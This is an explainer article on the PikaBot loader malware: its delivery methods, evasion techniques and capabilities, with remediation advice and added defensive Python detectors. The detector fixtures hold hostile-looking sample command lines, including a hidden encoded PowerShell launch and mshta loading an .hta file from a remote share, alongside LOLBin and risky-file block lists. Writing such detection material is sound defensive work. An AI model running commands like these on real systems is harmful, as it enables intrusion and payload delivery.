What is PikaBot Malware? How to Get Rid of It?

PikaBot is a sophisticated malware program that works as a loader and backdoor, giving attackers access to and control over a compromised PC. It has a modular structure: a loader and a core module work together to carry out an attack. The loader downloads and activates the core module as the first step of the infection. Once the core module is running on the PC, it carries out the harmful activity: it downloads additional files, modifies system settings, and launches malware payloads according to the instructions it receives from the cybercriminals.

PikaBot infects a system remotely using its modular structure, and its components stay hidden on the infected system. The core module remains encrypted to avoid detection. It connects to a remote command-and-control (C2) server, which sends instructions to the module, and the malware acts on those commands. PikaBot uses a code injection technique to infect a device: it first decrypts the core module and then injects it into a legitimate program, so that the malicious code looks like part of a legitimate program or process on the PC.
PikaBot came to light in early 2023, filling the gap left by other malicious programs such as QakBot and DarkGate. It uses the same techniques as QakBot and DarkGate to spread and infiltrate a system, including phishing emails, compromised websites, and unsafe attachments, and it shows the same pattern of communication with its C2 server to support malicious activity inside the system. PikaBot is a real cybersecurity risk in today’s digital age.

What Methods Does PikaBot Use to Reach Your PC?

PikaBot uses email spam campaigns, malicious links, and zip files to infect and access a device. It follows the same methods as QakBot and DarkGate to infiltrate a computer and inject it with malicious programs. Here are the methods PikaBot uses to infect and access a device:

Email Spam Campaigns

In this method, cybercriminals send spam emails in bulk to potential victims. From the outside, these emails look legitimate and appear to come from trusted sources. In reality, they are baits that trick the user into opening them and acting on their content. The emails pose as invoices, business communications, or notifications tailored to the victim’s location: the content, language, and formatting match what people in that region expect. When a user interacts with these emails, he is led to take the action the email asks for. As a result, malware is downloaded to the device, and the user ends up compromising his own PC.

SMB Networks and Links

Cybercriminals exploit SMB shares to distribute malware across devices. Server Message Block (SMB) is a network protocol for file sharing and computer-to-computer communication that lets devices access shared files on a local network. It provides a way of controlling and authenticating access to shared resources, and users rely on it to read and write files and request services from server programs on the same network. Cybercriminals place malware files and links on a computer; when that device connects to an SMB share, the malware can spread to the other devices on it. Once PikaBot’s core module is active on a system, the rest of the malware’s activity follows in the background.

Malicious Zip Files

Zip files are another method cybercriminals use to infect your device with PikaBot. They send you links to download zipped files that seem genuine and harmless. When you click the link and download the archive, you are downloading malware onto your PC: the zip contains loader files, and the loader initiates the infection with the main malware. The loader activates the core module on the PC, and all the malicious activity follows in the subsequent stages.
Attackers also make zip files available on SMB shares, from where they reach every device connected to the share. They use spam campaigns to deliver a link to the SMB share: the user receives an SMB share link to a zip file in a spam email. The malware becomes active when he clicks the link, downloads the zip file, and opens the executable inside it. After this, the loader downloads and activates PikaBot’s core module, and all the malicious activity starts rampaging through the device.

Different Attack Vectors

PikaBot uses different attack vectors to infect a system and get the most out of it. It employs multiple file formats to bypass security measures, and each file type uses a different method to deliver the malware. Cybercriminals pick the technique that fits the user in order to trick them into starting the infection. For example, a tampered Word document can start the infection process, and an executable can run the loader malware directly on the PC.
Based on this, if a user is more likely to open Word documents, the attackers will send them malicious documents; if the user works with executable files, they will send malicious executables. So, black hats use various vectors to inject malware into a PC, and PikaBot uses executable files, Office documents, PDF files, and compressed archives to launch its malicious operations.

HTML and JavaScript in Attachments

Attackers use HTML and JavaScript to launch and execute malware. They hide JavaScript inside HTML files, and vice versa, to conceal malware payloads and redirect users to compromised sites. This method lets them get past email security filters and other checks.

Moniker Link Bug

PikaBot exploits the Moniker Link feature to place a malicious link in an email that directs the user to a remote SMB share seeded with the malware. When the user clicks a Moniker Link that references an SMB share, the remote source carrying the malware is opened automatically, and the malware enters the device when the user clicks the download link. Cybercriminals can easily infect a device with PikaBot by exploiting the Moniker Link feature, and it gives them the added advantage of bypassing security measures: the Moniker Link contains neither a traditional file attachment nor a link to a known malicious domain, so conventional email filtering fails to detect the threat in the reference link.

What Techniques Does PikaBot Use to Avoid Detection?

PikaBot uses highly advanced tactics to avoid detection while carrying out its malicious operations: data theft, spying, online tracking, and supporting ransomware gangs. Here are some points that explain how it keeps those operations hidden:

Encrypted Communication Channels

PikaBot uses secure communication channels to its command-and-control (C2) server, so all the data it sends and receives stays encrypted. Encryption hides the nature of the transmitted data, which makes it quite difficult for security tools to identify the malicious program and prevent it from infiltrating your PC.

Non-Standard Port

To avoid detection by security software and other monitoring tools, PikaBot uses non-standard ports. Security software tends to focus on standard ports, such as HTTP on port 80 or HTTPS on port 443, and traffic on a non-standard port can slip past it. In this way, non-standard ports let the malware establish communication with the C2 server while bypassing protective measures.
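As an added illustration (this code is not part of the original article), here is a small Python check of the kind a defender can run over connection telemetry to catch web-style traffic on ports outside the usual baseline. The records, the port baseline and the list of script hosts are constructed assumptions; on a real network the records would come from a sensor that identifies the application protocol from the payload (Zeek does this independently of the port number), because a check that only looks at the port number is exactly what this evasion defeats.

```python
"""Flag HTTP/TLS connections that leave on non-standard ports.

Added example, not from the article. The records below are constructed to
resemble what an endpoint sensor or protocol-aware firewall would emit; the
field names, port baseline and script-host list are assumptions.
"""
from collections import Counter

# Ports on which HTTP/TLS traffic is expected; anything else is "non-standard".
STANDARD_WEB_PORTS = {80, 443, 8080, 8443}

# Script hosts and proxy binaries that rarely have a legitimate reason to talk to the internet.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe"}

# Constructed sample records: "app" is the protocol the sensor identified from
# the payload, not a guess from the port number.
SAMPLE_CONNECTIONS = [
    {"host": "ws01", "process": "chrome.exe",  "dst": "203.0.113.10", "port": 443,  "app": "tls"},
    {"host": "ws01", "process": "outlook.exe", "dst": "203.0.113.25", "port": 443,  "app": "tls"},
    {"host": "ws01", "process": "svchost.exe", "dst": "198.51.100.7", "port": 2967, "app": "tls"},
    {"host": "ws01", "process": "svchost.exe", "dst": "198.51.100.7", "port": 2967, "app": "tls"},
    {"host": "ws02", "process": "teams.exe",   "dst": "203.0.113.40", "port": 3478, "app": "stun"},
    {"host": "ws02", "process": "wscript.exe", "dst": "198.51.100.9", "port": 2078, "app": "http"},
]


def find_nonstandard_web_traffic(records):
    """Return one alert per (host, process, destination) that speaks HTTP/TLS
    on a port outside STANDARD_WEB_PORTS, with the reasons that raised it."""
    # Count identical flows so that repeated connections (beaconing) stand out.
    flow_counts = Counter((r["host"], r["process"], r["dst"], r["port"]) for r in records)
    alerts, reported = [], set()
    for r in records:
        key = (r["host"], r["process"], r["dst"], r["port"])
        if r["app"] not in {"http", "tls"} or r["port"] in STANDARD_WEB_PORTS or key in reported:
            continue
        reported.add(key)
        reasons = [f"{r['app']} on non-standard port {r['port']}"]
        if r["process"].lower() in SCRIPT_HOSTS:
            reasons.append(f"initiated by script host {r['process']}")
        if flow_counts[key] > 1:
            reasons.append(f"repeated {flow_counts[key]} times (possible beacon)")
        alerts.append({"host": r["host"], "process": r["process"],
                       "dst": f"{r['dst']}:{r['port']}", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_nonstandard_web_traffic(SAMPLE_CONNECTIONS):
        print(alert["host"], alert["process"], alert["dst"], "->", "; ".join(alert["reasons"]))
```

The STUN traffic from the collaboration client on port 3478 is deliberately left alone: the point is not that every unusual port is hostile, but that HTTP or TLS on a port where nobody expects it deserves a look, especially when a script host started it or it repeats on a schedule.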

Virtualization Evasion

PikaBot checks for virtual machines (VMs) to learn about the environment it is running in. It looks for signs of virtualization such as hardware configurations, VM-related system files and processes, and the sandboxes that security software uses to study unknown programs. If it detects any such sign, PikaBot disables its functionality so that security software cannot analyze it and learn more about the malware. This makes it far more difficult for security teams to study the malware and build a defense against it.

Process Injection

PikaBot uses process injection to place its malicious code in the memory space of legitimate system processes. Once the code is injected into a legitimate program, the malware’s activity runs alongside that of the original program while remaining hidden. In this situation, identifying the real culprit becomes quite challenging for a system’s defences.

Persistence Mechanisms

PikaBot uses various persistence methods: scheduled tasks, the PC’s startup functionality for launching programs automatically, and registry modifications. In the registry, the malware adds entries so that it starts automatically whenever the system boots, and it stores configuration data there, such as C2 server addresses and infection markers. It can also disable the system’s protection features and firewall to avoid detection. Using these techniques, PikaBot can easily maintain its persistence and presence on a device.
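Here is an added example (not from the original article) of how a defender can triage the autostart locations the paragraph mentions, Run keys and scheduled tasks, for the traits that malware persistence tends to show. The entries are constructed to look like Run-key values and task actions; on a real host they would come from the registry and the Task Scheduler (for instance via Sysinternals Autoruns). The path patterns, the launcher list and the weights are assumptions for illustration.

```python
"""Score Windows autostart entries for traits associated with malware persistence.

Added example, not from the article. Entries are constructed; on a real host
they would be read from the Run keys and the Task Scheduler. Weights, path
patterns and the proxy-launcher list are assumptions.
"""
import re

# Executables staged in Temp are a strong signal; other user-writable locations
# are weaker because per-user installers (e.g. OneDrive) legitimately live there.
TEMP_DIR = re.compile(r"\\Temp\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Public)\\", re.IGNORECASE)
# Binaries that malware commonly uses to launch a DLL or script indirectly.
PROXY_LAUNCHERS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "powershell.exe", "cmd.exe"}

# Constructed sample entries mimicking Run-key values and scheduled-task actions.
SAMPLE_AUTORUNS = [
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrive",
     "command": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Updater",
     "command": r"rundll32.exe C:\Users\alice\AppData\Roaming\Ukvd\hjkq.dll,Entry"},
    {"source": "Task Scheduler", "name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"source": "Task Scheduler", "name": "SysHelper",
     "command": r"C:\Users\alice\AppData\Local\Temp\upd.exe"},
]


def _executable(command):
    """Return the program path from a command line, honouring a quoted first token."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(None, 1)[0]


def review_autoruns(entries):
    """Return entries that raised at least one signal, highest score first."""
    findings = []
    for entry in entries:
        exe_name = _executable(entry["command"]).rsplit("\\", 1)[-1].lower()
        signals = []
        if exe_name in PROXY_LAUNCHERS:
            signals.append((2, f"starts through proxy launcher {exe_name}"))
        if TEMP_DIR.search(entry["command"]):
            signals.append((2, "runs from a Temp directory"))
        if USER_WRITABLE.search(entry["command"]):
            signals.append((1, "references a user-writable directory"))
        if signals:
            findings.append({"name": entry["name"], "source": entry["source"],
                             "score": sum(weight for weight, _ in signals),
                             "reasons": [reason for _, reason in signals]})
    findings.sort(key=lambda f: f["score"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in review_autoruns(SAMPLE_AUTORUNS):
        print(f["score"], f["source"], f["name"], "->", "; ".join(f["reasons"]))
```

Scoring rather than a yes/no verdict matters here: the legitimate OneDrive entry also sits under AppData, so a rule that flags every user-writable path would drown the analyst in noise, while the combination of a proxy launcher and an odd DLL under AppData, or a bare executable in Temp, is worth pulling for inspection.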

Collect Data About Infected PC

PikaBot surveys the device it has infected and collects detailed information about it: the operating system version, network settings, running processes, and the active defences on the device. With this survey, black hats learn about the conditions and choose the most effective method for their malicious operations. The attackers share this information with ransomware operators so that they can tailor their approach; using it, they pinpoint high-value targets and data, and then launch their operations to encrypt files and lock the user out of the system.

Suspended Injection Process

In this technique, the malware first suspends the target program and then injects its code into that program’s memory space. Because the process is suspended, the injection avoids triggering the alerts of behaviour-analysis tools that monitor the system around the clock. After the injection is complete, the suspended process resumes its activity, and the behaviour-based scanner fails to notice the malware and its suspicious activity on the system.

Indirect System Calls

Programs make system calls to request services from the operating system. Indirect system calls are requests that do not go straight to the service they need but are routed through an intermediary. PikaBot uses indirect system calls to hide the true nature of its actions, which makes it difficult for the anti-malware software on the device to detect the malware and its activity. Since the system call pattern does not match the known signatures, the malware remains undetected.

Dynamic Decryption of Strings

PikaBot uses dynamic string decryption to keep its code from revealing what it does. Critical strings such as URLs, function names, or encryption keys are not stored in plaintext: they stay encrypted, and the malware decrypts them only at run time, when they are needed. Because of this, static analysis tools cannot read the information quickly; the strings remain encoded, and the true nature of the activity stays obscure to the defences.
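To show what an analyst does about this, here is an added example (not from the article, and not PikaBot’s actual scheme, which is not reproduced here) that recovers strings hidden behind the simplest form of runtime string encoding, a single-byte XOR, by trying every key and keeping the ones that yield configuration-like text. The encoded blob, the key, the indicator fragments and the thresholds are all constructed assumptions; the same brute-force idea is what tools such as xorsearch apply to real samples.

```python
"""Recover single-byte-XOR-encoded strings from a blob, the way a static
analyst brute-forces the simplest runtime string obfuscation.

Added example, not from the article and not PikaBot's real routine. The blob
is constructed in memory; key, indicators and thresholds are assumptions.
"""
import re

# Runs of six or more printable ASCII bytes are candidate strings.
TOKEN = re.compile(rb"[\x20-\x7e]{6,}")
# Fragments a decoded configuration string is likely to contain (assumed, generic).
INDICATORS = (b"http", b"://", b".dll", b".exe", b"Software\\", b"System32")


def xor_bytes(data, key):
    """XOR every byte with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def recover_strings(blob, min_hits=2):
    """Try every key 1..255 and return {key: [decoded strings]} for keys whose
    output contains at least min_hits indicator-bearing tokens."""
    results = {}
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        hits = [t.decode("ascii") for t in TOKEN.findall(decoded)
                if any(ind in t for ind in INDICATORS)]
        if len(hits) >= min_hits:
            results[key] = hits
    return results


def build_sample_blob(key=0x5A):
    """Constructed stand-in for a data section: junk bytes around XOR-encoded strings."""
    secrets = [b"https://203.0.113.77:2967/gate",
               b"C:\\Windows\\System32\\kernel32.dll",
               b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"]
    # A separator equal to the key decodes to NUL, so each string stays a distinct token.
    encoded = bytes([key]).join(xor_bytes(s, key) for s in secrets)
    return b"\x90" * 16 + encoded + b"\x90" * 8


if __name__ == "__main__":
    for key, strings in recover_strings(build_sample_blob()).items():
        print(f"key 0x{key:02x}:")
        for s in strings:
            print("   ", s)
```

Requiring several indicator-bearing tokens per key is what keeps the result clean: a wrong key can turn one stray byte into a backslash or a dot, but it will not produce a URL scheme and a DLL name at the same time. Real samples use stronger schemes than a single XOR byte, which is why the practical answer is usually to let the malware decrypt its own strings in a sandbox or under a debugger and read them from memory.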

Developing New Versions

To avoid detection, PikaBot keeps developing new versions of its code. Since its launch in 2023, it has become more advanced, improving its functionality and its evasion techniques. The latest version, from February 2024, introduced new anti-analysis capabilities, and its command-and-control (C2) communication was also changed in many ways to beat the latest anti-malware software.

What Harmful Activities Does PikaBot Perform?

PikaBot is a highly sophisticated malware that poses various security risks to digital devices, networks, and privacy. It is capable of a wide range of harmful activities that put users at serious risk. Here are some of the security risks PikaBot poses for internet users:

Payload Delivery

It can download and run additional payloads carrying different types of malware. It can deliver malicious programs such as ransomware, spyware, keyloggers, crypto-miners, and post-exploitation tools like Cobalt Strike and Meterpreter to penetrate a system more deeply.

Gathering System Information

It can gather system information, including the operating system version, hardware specifications, running processes, network configuration, and more, to launch successful attacks.

Credential Theft

Once it is inside your PC, it can easily steal your critical data, user IDs, browser-stored passwords, and other confidential information.

Targeted Attacks

Using its modular design and the data it has collected, it can easily customize an attack for a device. Depending on the device’s condition, it can deploy a fitting ransomware or spyware to infect the system and further its malicious activity.

Privilege Escalation

Privilege escalation exploits system vulnerabilities to run malicious code with higher rights on the PC. The malware can also manipulate internal processes to give black hats more control over the device, which lets them access sensitive areas and do their work without hindrance.

Network Propagation

It can spread through networks, moving the malware to every device connected to the same network. It exploits SMB shares (file shares) within a network to propagate the malware at the organizational level.

Crypto-Mining

PikaBot can use a device’s processing power to mine cryptocurrencies. It runs the mining program in the background to validate transactions. The mining slows the system down, consumes its resources, and leaves the device sluggish and unfit for normal tasks.

Installing Spyware & Ransomware

PikaBot can download and run spyware and ransomware on a device to track all online activity and encrypt the whole system. Spyware collects data including keystrokes, screen captures, and browsing history. Ransomware encrypts the system’s files and data and blocks access to them, creating all sorts of difficulties for the user.

Run Arbitrary Commands

PikaBot can run arbitrary commands on the system. With these commands it can modify files, disable security features, and install more malware. Once it succeeds, it delivers malicious programs to the device, including trojans, browser hijackers, rootkits, keyloggers, and more.

Botnet Participation

It can add the system to a botnet, a network of infected devices. Black hats control these devices and use them for purposes like Distributed Denial of Service (DDoS) attacks and sending spam email.

How to Get Rid of the PikaBot Virus?


Disable Risky Files

You must disable the risky file types that let the malware start the infection in the first place. These include .hta (HTML Application files), .xll (Excel add-ins), .js (JavaScript files), .wsf (Windows Script Files), and .msi (Microsoft Installer files). Attackers use these file types in phishing campaigns against their targets. When you prevent these file types from running, PikaBot cannot use them to initiate the infection process.

Behavioral Detection

Use a behavioural detection tool to monitor for and identify suspicious system activity. Such a tool detects misuse of living-off-the-land binaries (LOLBins) such as PowerShell, cmd.exe, mshta.exe, and others. If PikaBot uses any of these binaries for malicious activity, behavioural detection will catch it and flag the malware.
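As an added example (not from the original article), here is the kind of rule a behavioural detection tool applies to process-creation telemetry to catch the LOLBin misuse described above: a document or mail client spawning a script host, an encoded PowerShell command, or a command line that reaches out to a UNC path or a script file. The events are constructed to mimic the fields of Sysmon event ID 1 or EDR process-start records; the application lists, the patterns and the placeholder base64 argument are assumptions.

```python
"""Flag process-creation events in which a document/mail application spawns a
living-off-the-land binary, or a LOLBin runs with a suspicious command line.

Added example, not from the article. Events are constructed to resemble
Sysmon event ID 1 fields; lists and patterns are assumptions.
"""
import re

# Applications that open untrusted content and should almost never spawn a script host.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Built-in binaries that attackers repurpose to run code or fetch payloads.
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# Command-line traits that support an alert; each is paired with its label.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"\b(https?|file)://", re.I), "remote resource in command line"),
    (re.compile(r"\\\\[\w.-]+\\", re.I), "UNC path in command line"),
    (re.compile(r"\.(hta|xll|js|wsf|vbs)\b", re.I), "script or add-in file type"),
]

# Constructed sample events (the base64 argument is a placeholder, not a real payload).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"parent": "outlook.exe", "image": "mshta.exe",
     "cmdline": r"mshta.exe \\198.51.100.9\share\invoice.hta"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def detect_lolbin_chains(events):
    """Return alerts for LOLBin launches that carry at least one supporting signal."""
    alerts = []
    for ev in events:
        parent, image = ev["parent"].lower(), ev["image"].lower()
        if image not in LOLBINS:
            continue
        reasons = []
        if parent in DOCUMENT_APPS:
            reasons.append(f"{ev['parent']} spawned {ev['image']}")
        for pattern, label in SUSPICIOUS_ARGS:
            if pattern.search(ev["cmdline"]):
                reasons.append(label)
        # A LOLBin with no supporting signal (e.g. "cmd.exe /c dir") is normal noise.
        if reasons:
            alerts.append({"image": ev["image"], "parent": ev["parent"],
                           "cmdline": ev["cmdline"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_lolbin_chains(SAMPLE_EVENTS):
        print(f"{alert['parent']} -> {alert['image']}: " + "; ".join(alert["reasons"]))
```

The parent/child relationship is the strongest signal in this rule: an administrator running cmd.exe from Explorer is routine, whereas Word or Outlook launching PowerShell or mshta.exe almost always means a document or message has just executed something.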

Use EDR Solutions

Implementing an EDR solution to monitor endpoint activity is one of the best options for dealing with malware like PikaBot. It monitors the endpoint in real time, identifies suspicious activity, and automatically blocks or sandboxes the threat. It can effectively catch process injection, dangerous file executions, and connections to unsafe domains.

Avoid Phishing and Spam Emails

It is highly important to avoid phishing and spam emails to protect your devices from loaders and modular malware. Spam and phishing campaigns are the methods cybercriminals most often use to infect a device with PikaBot. You should use smart email filtering solutions and content analysis tools to detect and block threats and malicious attachments.
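Bringing together the delivery tricks described earlier (loaders inside zip files, the risky file types listed under “Disable Risky Files”, and links that point at SMB shares), here is an added example, not from the original article, of the content check a mail filter can apply before a message reaches the user. The message, its nested archive and the policy lists are constructed assumptions; the .js member is a harmless placeholder.

```python
"""Inspect an inbound mail's attachments and body for loader-style delivery:
archives (including nested ones) carrying script/installer file types, and
links that resolve to SMB shares.

Added example, not from the article. The message is constructed in memory
and the policy lists are assumptions.
"""
import io
import re
import zipfile

# File types named in the article as infection starters, plus close relatives.
RISKY_EXTENSIONS = {".hta", ".xll", ".js", ".jse", ".wsf", ".vbs", ".msi", ".lnk", ".exe", ".dll"}
ARCHIVE_EXTENSIONS = {".zip"}
# file:// URLs and raw UNC paths both open an SMB share when clicked on Windows.
SMB_LINK = re.compile(r"""(file://[^\s"'<>]+|\\\\[\w.-]+\\[^\s"'<>]+)""", re.IGNORECASE)


def _extensions(name):
    """All trailing extensions of a file name, so 'invoice.pdf.js' gives ['.pdf', '.js']."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return ["." + p for p in parts[1:]]


def inspect_archive(data, depth=0, max_depth=3):
    """Return risky member names in a zip, recursing into nested zips up to max_depth."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            exts = _extensions(info.filename)
            if not exts:
                continue
            if exts[-1] in RISKY_EXTENSIONS:
                findings.append(info.filename)
            elif exts[-1] in ARCHIVE_EXTENSIONS and depth < max_depth:
                nested = inspect_archive(zf.read(info), depth + 1, max_depth)
                findings += [f"{info.filename}!{member}" for member in nested]
    return findings


def inspect_message(attachments, body):
    """attachments: {filename: bytes}; body: message text/HTML. Returns a verdict."""
    reasons = []
    for name, data in attachments.items():
        exts = _extensions(name)
        if exts and exts[-1] in RISKY_EXTENSIONS:
            reasons.append(f"attachment {name}: blocked file type")
        elif exts and exts[-1] in ARCHIVE_EXTENSIONS:
            for member in inspect_archive(data):
                reasons.append(f"attachment {name}: contains {member}")
    for link in SMB_LINK.findall(body):
        reasons.append(f"body links to an SMB share: {link}")
    return {"block": bool(reasons), "reasons": reasons}


def build_sample_message():
    """Constructed input: a zip nested in a zip carrying a double-extension .js loader,
    a benign PDF, and a body link to a share (placeholder content throughout)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("invoice_0423.pdf.js", "// placeholder text, not a script")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("readme.txt", "please review the attached invoice")
        zf.writestr("invoice.zip", inner.getvalue())
    body = 'Your statement is ready: <a href="file://198.51.100.9/share/statement.hta">open</a>'
    return {"invoice.zip": outer.getvalue(), "quote.pdf": b"%PDF-1.4 placeholder"}, body


if __name__ == "__main__":
    attachments, body = build_sample_message()
    verdict = inspect_message(attachments, body)
    print("block" if verdict["block"] else "deliver")
    for reason in verdict["reasons"]:
        print("  -", reason)
```

Two details matter in practice: the check looks at the last extension, so “invoice.pdf.js” is judged as JavaScript and not as a PDF, and the recursion is bounded so that a deliberately deep or oversized archive cannot tie the filter up; a production filter would add a byte limit on extracted content for the same reason.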

Network Security and Access Restrictions

Network security is one of the most important factors in preventing malware infections. You should limit access to SMB resources and monitor network traffic to protect your devices. Along with this, use threat intelligence, antivirus software, and network firewalls to control and monitor your devices’ online traffic. It is highly important to separate critical systems and sensitive data from other parts of the network; this segmentation stops malicious programs from spreading.

Regular Updates and Patching

It is highly important to keep your operating system, apps, and accounts up to date so that malware cannot exploit known vulnerabilities to infect your PC. Regular updates patch the security holes and program vulnerabilities that come to light over time, so make sure to install new updates as soon as they are available. New updates also bring upgrades and features that make for a smoother user experience.

Disable Macros in Office Documents

Macros are scripts embedded in Office documents such as Word, Excel, or PowerPoint files. They are one of the most common methods cybercriminals use to inject malicious code into a system: black hats write these scripts in a language such as Visual Basic for Applications (VBA) or JavaScript and embed them in an Office document. Hence, it is highly important to disable macros in Office documents to prevent malware infection on your device.

Take Backup Regularly

You should back up all your important files and data to minimize the effect of ransomware. In case of a ransomware attack, you will be able to recover your data and keep working on your system without further risk.